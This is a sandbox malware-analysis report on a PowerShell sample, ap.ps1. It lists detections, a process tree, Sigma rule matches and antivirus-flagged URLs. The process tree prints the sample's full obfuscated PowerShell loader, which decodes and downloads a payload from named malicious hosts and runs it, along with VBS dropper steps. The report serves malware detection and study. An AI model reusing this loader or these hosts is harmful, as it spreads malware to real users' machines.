Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ap.ps1

Overview

General Information

Sample name:ap.ps1
Analysis ID:1568999
MD5:fd4a7beeefde4074f9d7c04832560ccc
SHA1:2750778b94a0797a87f488673043db54691043b2
SHA256:585a089fb20209a3de1a3e87799320174f90336e92c256eb4e789428f306ceee
Tags:Listofrequireditemsps1user-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Obfuscated command line found
Powershell creates an autostart link
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Scan Loop Network
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 8104 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 8112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7544 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\utwxgh.vbs'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • wscript.exe (PID: 7448 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • powershell.exe (PID: 8156 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeUdmaa) exp, ');sanktionjtr (gaardspladsens 'Nouve$FrankgA.romlE,ponoThirdbVar,eaC eckl Angi:FurfuPFolliaBj.rgr BrneaSy pllMgli a ugerlD,nceiNonteaClosk=.epid$SkovgU DyslnGasliyMelaetsnesetDubbaiT,dtag Ov.rsIm.untAgrar. RejosP cnopKnaldlUdstriEnalitusik,( Comb$AfblnDA.iseePer,gaquiltkBountt.arnaighanevIntuieFremfr Impie Hu.gnUheldd LufteAto a) Sile ');sanktionjtr (gaardspladsens 'Ty,hl[Re.roNGa.teeAnskutNedsa.LilleS Forde Ind rMechovHistriBronzcUdvinejalo,PQualio wi niT ksan Tr.mtTra.iMToldva U.henDe phaSpansgHybrieDecarrBottl]Inder:Mi.un:UntraSst vse B,gvcInd auGietirLselyikva,ttLout.yTamanPArgierFjo.toAnmartIntero LigncUnsweo He slFgte Sigh.=Profe Sexga[R.klaNGged eBuddhtCyclo. SpheSsto.leRetaxcBijouuMessirRugnii,lidft KalvyKo mePPligtrHurraoChar tPaintoH.drac SelmoAur.clpulicTBa.isyRetropSkulle Be r]Multi:im.fs:Lsel Tta celmobilsNodia1 ejs2Chart ');$Unyttigst=$Paralalia[0];$Sportshelt= (gaardspladsens 'Urinv$ ,onog Di,ul.osanoNondibvrts,aDaughlOrtho:Ek alHGoa taHirude m.ldmFraukoUnintpContar inteotomogtDereieArbeju UdensLeu.o5Una.a3Snown=scopiNLiskae Undewbalda- .limOIntimbH enejF,ktoeJack.c Ps ctSpini Lab,SFa.veyLodsns.peletSaurueFejl.mKr kk.Scal NB.screHoftetFlers.Prin,WLiti,e uwarbv,ndiCUpbuilUnsigiBel ne Causn akset');$Sportshelt+=$Udsmeltningen[1];sanktionjtr ($Sportshelt);sanktionjtr (gaardspladsens ' alvf$P.risHLaerea,raineEskadm Foreoco,iop FortrNynazo Misdt Hexye PhotuKahausFl.ve5Ne.ro3dixli.SabbaH sveseF,revaLiljedIndspe P adrFuglesPreim[Gsac $Mas.iFSkovta Paasn PoolgAntifsK,pittTili,k Panin,iheni MetavLqwbee Gir,nTri.isExend]Overa= Fisk$EretrFSkviso Fla rEnsemlElaf nConteg SkrueAirstl ErfasTypeaeUnderr O.hasPlayb ');$Frstepladserne=gaardspladsens 'Upres$trideHRe veaPhysieStannmMinstoNondupIlma rmuseto Damptpr.geeImidouBommesHuman5No,ex3Uaktu. CyniDInklioTranswSigisnSm.rtlBeclooSemica Vindd Uno.FUp,igi Bilil KataeP,ash(Til a$SpdbrURestin,enziyAst ot rndstlkkeriKalkbgUncoms D.satA,lur, Selv$ArbitSStrafv .jereLuskejPochosCawineAuspirTypehePs.ud)Mm.rl ';$Svejsere=$Udsmeltningen[0];sanktionjtr (gaardspladsens 'Stand$,ytotgVarkal Tr,aoBoxlibCebriaBehanlMobil:wormsRAmm,nePunits Isdee Heiim Ste,bM.cerlGrentaAcetab askl FiceeCo.on=Recon(hofmaT,ndreeStu fsElekttpickp- ButtPUnempaFunktt Adr hdegra B nkr$Barn.STt.ekvThyroeCout.j SarasTibbie S ndrUdsp.ePrimu)Vasif ');while (!$Resemblable) {sanktionjtr (gaardspladsens 'Mango$ IliogArb jlCombpo Gipsbfi keaB,litl and:BacciU InornMazareUfat lDramaa Ulf.bDampso tormrAktena Acidt Bokoe S.nslMalocyvelli=Fa gl$BlacktPennyr Brumu.akfjeH pog ') ;sanktionjtr $Frstepladserne;sanktionjtr (gaardspladsens ' Ga,eSAnoretSmasha,ildvr,oncetForci-StillSLinjelformue Moboe Skrap Skif aller4Nicke ');sanktionjtr (gaardspladsens ' Grap$Falkegm,ctulAppelo AnlgbForstaTory,l Tine:ElectR Slideamatrs Dre e SvavmDelinblivsrlSatyraThomibUdskilCocree wird=adapi(ReamuTKseb.eUnives A,detGhett-GhettP OrgaaPa.hytWasseh Amat .eolp$veterSIndvivAm,uleTra.sjM sstsDuffieO nirr rgfoe Forb)Outa. ') ;sanktionjtr (gaardspladsens 'Lgter$IndopgAimlelro tio CorcbOuts.aT.glvlArrhy:PulchVOlie,eHomeonFre.sufo,gasA cohhIntera.upidaMonarrMaske= Uhde$GriflgSvinal,eekeo FilmbOchera D.lelagfas: epokKMa mil Loudoallots emoneArriltSkidtt handeUfordrVulgan UnrueTakhas Coff+Newfa+qu,ry%Spise$KitteP AfplaAstigrEarboaPersplFa ilaExsanl Srvei U staPorta.TangecCompoo Mlkeu,olban overt Blod ') ;$Unyttigst=$Paralalia[$Venushaar];}$Relationsnavne=334162;$Fraflytter=29582;sanktionjtr (gaardspladsens 'Falu $ crosgSerielUnfenoRefrib ElspaMelanlFrame:P,votNGonotoAnsjons ptldDiseqiC pyrsS.lfus riftiSc,urpTekstaSlikmt Aa,eeLykkedRubrilAf,ejytrilr besky=Spiru .etskG SynseMaskit Subs-materCHustao.defonAnsvatMil.beSkuern B.rgtAppea Ploug$SemaeSSuspevM dlaePassejSprins Rac,ePlonkrAdmiteSound ');sanktionjtr (gaardspladsens 'Inapp$Marsigblon lAr,tho SkolbBedstaOp uslCoccy:OvergSSkorzuFireap GlazeOpmunrDal,ts Wiene .nrec No.crFl.mme rudttOmk aiP,admo OvarnScree Udvi=St,an V st[amen SStammyGenres KvabtAmo,peS.rafmSmitt.Un,ipCRespioFi,tnnPr grv Poc eG,naerSamdetcoope]hinde:Kompr:KrykhFGlendrPolyeoB.tonmVed,rBGersoaAnacas StineNon.e6 Tidl4RivalS isket.atchr bsiti rikenaltrigGenae(Co.ka$IncitNMisimothu,nnHaanddH.vegiUnr.vsSandbsWomaniKosyspProteaMaskit re.reVal,dd HulklHo,edyFet,r)Svov. ');sanktionjtr (gaardspladsens 'Ka.kv$Ko,plg ,adelLimi.oCa cibUgenna UmenlLithi: BourAMetacrSekune Gurso Ha,dg Sup rD.staaSubsipOp.rvhpik,me oldorkonom Monst=Garni Scabr[D bleSUdtynyTapiosA.hudtBekose.edemmMarti.DibleTNeur,e S,gexSubautmorp .SkrifEDe epn SkadcMicrooPar gdF,gseiProdunBlomsgRecom]Milor:Ypsil:AngloANo.anSexarcCDriftI Ey pICadis.UnmilG acaneGuldstMurexSm rgitEft rrUdatei An inAttaigIsole(Uds.r$InterSIndisu.rtmapU,chaeTriazrTlpersFrstee Laerc oplr ObpyeNegrotUnc,nixenoloPlintnNonid)W nds ');sanktionjtr (gaardspladsens 'Bedre$Shan g misbl ingeoVestubKoorda Pettl.bebo: Nystn Quira ntipcikorh HalltB,conh MelaeProvenBoff.iRea dcAgate=deskt$ Kil,A EfterHool.e MechoAr ejgChastrHylstaUnnotpTurrihForudeA,rsdrNatur. SlhusBoissuou,lib,ventsDo.umtUnebrrGledeiFldstnHortegSvige(Lgdom$FodboRCam teForlol AnveaFoldetA.onyiCon,eoCo panTvrersPolitnSkspoa Th,uvRelegn Smele To k,Phase$EjendF kl,arServiaAllitf AfmulTyre.yAntiotOcta.tHonnreDigenrKaard)Petro ');sanktionjtr $naphthenic;" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 1272 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 8104JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 8156JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_8104.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        amsi64_8156.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Potentially Suspicious PowerShell Child Processes
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8104, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs" , ProcessId: 7448, ProcessName: wscript.exe
          Sigma detected: Script Interpreter Execution From Suspicious Folder
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8104, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs" , ProcessId: 7448, ProcessName: wscript.exe
          Sigma detected: Suspicious PowerShell Parameter Substring
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\utwxgh.vbs'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\utwxgh.vbs'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8104, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\utwxgh.vbs'", ProcessId: 7544, ProcessName: powershell.exe
          Sigma detected: WScript or CScript Dropper
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8104, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs" , ProcessId: 7448, ProcessName: wscript.exe
          Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
          Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8104, TargetFilename: C:\Users\Public\sz3.vbs
          Sigma detected: Change PowerShell Policies to an Insecure Level
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1", ProcessId: 8104, ProcessName: powershell.exe
          Sigma detected: Potential Binary Or Script Dropper Via PowerShell
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8104, TargetFilename: C:\Users\Public\sz3.vbs
          Sigma detected: Suspicious Scan Loop Network
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeUdmaa) exp, ');sanktionjtr (gaardspladsens 'Nouve$Fra
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8104, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs" , ProcessId: 7448, ProcessName: wscript.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1", ProcessId: 8104, ProcessName: powershell.exe

          Suricata Signatures

          No Suricata rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: ap.ps1Avira: detected
          Antivirus detection for URL or domain
          Source: https://www.erp-royal-crown.info/wh/SubordinerendeAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SubordinerendAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SubordinerenAvira URL Cloud: Label: phishing
          Source: http://www.erp-royal-crown.infoAvira URL Cloud: Label: phishing
          Source: https://www.pineappletech.ae/na/mg.vbsAvira URL Cloud: Label: malware
          Source: https://www.erp-royal-crown.info/wh/SubordineAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.infoAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Avira URL Cloud: Label: phishing
          Source: https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdfAvira URL Cloud: Label: malware
          Source: https://www.erp-royal-crown.info/wh/SubordAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerendes78.smiAvira URL Cloud: Label: phishing
          Source: https://www.almrwad.com/wh/Subordinerendes78.smiAvira URL Cloud: Label: malware
          Source: https://www.erp-royal-crown.info/whAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SubordinereAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SuborAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SubordiAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SuboAvira URL Cloud: Label: phishing
          Source: http://erp-royal-crown.infoAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SubordinerendesAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerendes78.sAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SubordinAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerendes78Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerendes7Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/Avira URL Cloud: Label: phishing
          Multi AV Scanner detection for submitted file
          Source: ap.ps1ReversingLabs: Detection: 28%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.6% probability
          Source: unknownHTTPS traffic detected: 93.95.216.175:443 -> 192.168.2.10:49728 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 91.193.42.13:443 -> 192.168.2.10:49741 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.171.244.231:443 -> 192.168.2.10:49754 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 148.251.114.233:443 -> 192.168.2.10:49784 version: TLS 1.2
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1543104740.000002CD47A21000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.1543104740.000002CD47990000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: n.pdb source: powershell.exe, 00000005.00000002.1432126948.000001B65C8BD000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1432612236.000001B65C95A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2658934966.0000022F3971F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdbpdbtem.pdb source: powershell.exe, 00000009.00000002.2658538272.0000022F395CF000.00000004.00000020.00020000.00000000.sdmp
